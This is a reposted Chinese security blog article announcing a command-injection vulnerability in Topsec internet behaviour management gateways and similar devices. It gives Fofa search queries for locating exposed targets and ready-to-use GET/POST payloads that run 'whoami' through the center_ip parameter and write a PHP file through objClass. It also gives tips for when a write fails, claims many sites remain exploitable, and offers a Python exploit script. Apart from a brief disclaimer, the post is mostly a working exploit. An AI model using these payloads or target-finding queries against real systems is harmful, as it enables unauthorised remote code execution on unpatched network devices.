【核弹级】多类设备通杀漏洞-23年初挖掘-附Poc
2024-1-12 00:16:33 Author: 法克安全(查看原文) 阅读量:72 收藏

阅读须知

  亲爱的读者,我们诚挚地提醒您,本技术文章仅供个人研究学习参考。任何因传播或利用本文章提供的信息而造成的直接或间接后果及损失,均由使用者自行承担责任。作者对此概不负责。如有侵权,请立即告知,我们将立即删除并致歉。感谢您的理解与支持!

0x01
漏洞简介

该通杀漏洞来自于天融信上网行为管理系统发现

漏洞存在于:center_ip参数

0x02
响范围

各类上网行为网关,上网行为管理系统,上网行为审计等......

0x03
涉及范围

国内-国外均有

0x04
部分相关设备截图

影响众多设,就不全部截图了,自寻测绘引擎查找

0x05
Fofa语法
title==" Technology, Inc."body="dkey_activex_download.php"title=="Login @ Reporter"

           还有众多不同语法,自寻研究

0x06
漏洞复现

Payload:

/view/systemConfig/management/nmc_sync.php?center_ip=1;whoami%20%3E%201.txt;&template_path=1

                                 可GET可POST请求

       执行Payload过后弹窗提示OK就成功代码执行了

写入的文件地址: 

/view/systemConfig/management/1.txt

访问写入的文件,发现执行的whoami命令成功回显并输出到1.txt内容中。

如果发现执行poc过后访问写入的文件为404,那么说明此URL漏洞已修复或目录没有写入权限,请尝试修改写入的路径或者寻找其他URL进行测试。

也可尝试利用总结中的poc进行测试

0x07
利用脚本
后台回复'多设备通杀RCE'获取python利用脚本
0x08
总结

23年就发布此通杀到朋友圈,一直有人说我拿着:

/view/Behavior/toQuery.php?method=getList&objClass=%0aecho%20%27%3C?php%20phpinfo();?%3E%27%3E/var/www/reporter/5.php%0a

此poc招摇撞骗。

请睁大你的眼睛看清楚漏洞点位及存在漏洞的文

截止2024年1月11日,还有众多URL均可复现。

关于此类通杀漏洞挖掘Tips:

多尝试寻找不同厂商的相同类型的设备进行挖掘

希望师傅们天天得0day,也祝各位师傅们2024暴富!


文章来源: http://mp.weixin.qq.com/s?__biz=MzkwMjIzNTU2Mg==&mid=2247484170&idx=1&sn=7ebb033c062ae08b2354e6e9670c3af9&chksm=c1b304e41987b9adb2eb1e0c78c59bc6201b1479317673df9007bd3104d01b6663eb464ef436&scene=0&xtrack=1#rd
如有侵权请联系:admin#unsafe.sh